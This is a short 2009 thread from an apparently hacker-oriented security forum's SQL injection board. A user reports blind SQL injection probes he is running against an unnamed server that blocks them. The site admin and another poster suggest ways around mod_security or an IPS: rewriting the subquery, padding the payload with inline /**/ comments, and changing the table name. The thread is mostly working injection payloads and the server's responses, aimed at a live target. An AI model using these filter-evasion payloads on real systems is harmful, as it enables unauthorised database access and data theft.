 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
BLIND problem |
 |
 Posted: Wed Oct 14, 2009 4:39 pm |
 |
|
| crazynou |
| Advanced user |
 |
|
| Joined: Feb 08, 2009 |
| Posts: 199 |
| Location: AlGeRiA |
|
|
 |
|
 |
|
and (select 1)=1 true
and substring(@@version,1,1)=4 fals
and substring(@@version,1,1)=5 true
and (select 1 from user limit 0,1)=1 <=== Forbidden. You don't have
permission to access / on this server. |
|
|
|
|
| Posted: Wed Oct 14, 2009 4:42 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Probably it's mod_security or other IPS triggering against sql injection pattern. |
|
|
|
|
| Posted: Wed Oct 14, 2009 4:46 pm |
|
|
| crazynou |
| Advanced user |
|
|
| Joined: Feb 08, 2009 |
| Posts: 199 |
| Location: AlGeRiA |
|
|
|
|
|
|
| waraxe wrote: | | Probably it's mod_security or other IPS triggering against sql injection pattern. |
thanks admin
How can I bypass mod_security . IPS triggering? |
|
|
|
|
| Posted: Wed Oct 14, 2009 4:52 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Well, it depends ...
You must do multiple tests and determine, what's causing IPS triggering.
Try various sql queries. For example, try to go without "limit x,y":
and (select 1 from user limit 0,1)=1
Instead:
and (select 1 from user where id>1)=1
and (select 1 from user where id=1)=1 |
|
|
|
|
| Posted: Wed Oct 14, 2009 4:55 pm |
|
|
| crazynou |
| Advanced user |
|
|
| Joined: Feb 08, 2009 |
| Posts: 199 |
| Location: AlGeRiA |
|
|
|
|
|
|
| waraxe wrote: |
and (select 1 from user limit 0,1)=1
Instead:
and (select 1 from user where id>1)=1
and (select 1 from user where id=1)=1 |
Forbidden
You don't have permission to access / on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. |
|
|
|
|
| Posted: Wed Oct 14, 2009 4:58 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Probably it's triggering on subselects. Try inline sql comments:
| Code: |
and/**/(/**/select/**/1/**/from/**/user/**/where/**/id>1)/**/=/**/1
|
|
|
|
|
|
| Posted: Wed Oct 14, 2009 5:04 pm |
|
|
| crazynou |
| Advanced user |
|
|
| Joined: Feb 08, 2009 |
| Posts: 199 |
| Location: AlGeRiA |
|
|
|
|
|
|
| waraxe wrote: |
and/**/(/**/select/**/1/**/from/**/user/**/where/**/id>1)/**/=/**/1
|
the same problem |
|
|
|
|
| Posted: Sat Nov 21, 2009 8:01 pm |
|
|
| NickerzL |
| Beginner |
 |
|
| Joined: Nov 21, 2009 |
| Posts: 1 |
|
|
|
|
|
|
|
sorry for the bump, but I'm pretty sure the word user is making the problem.
try [users] |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 216
Members: 0
Total: 216
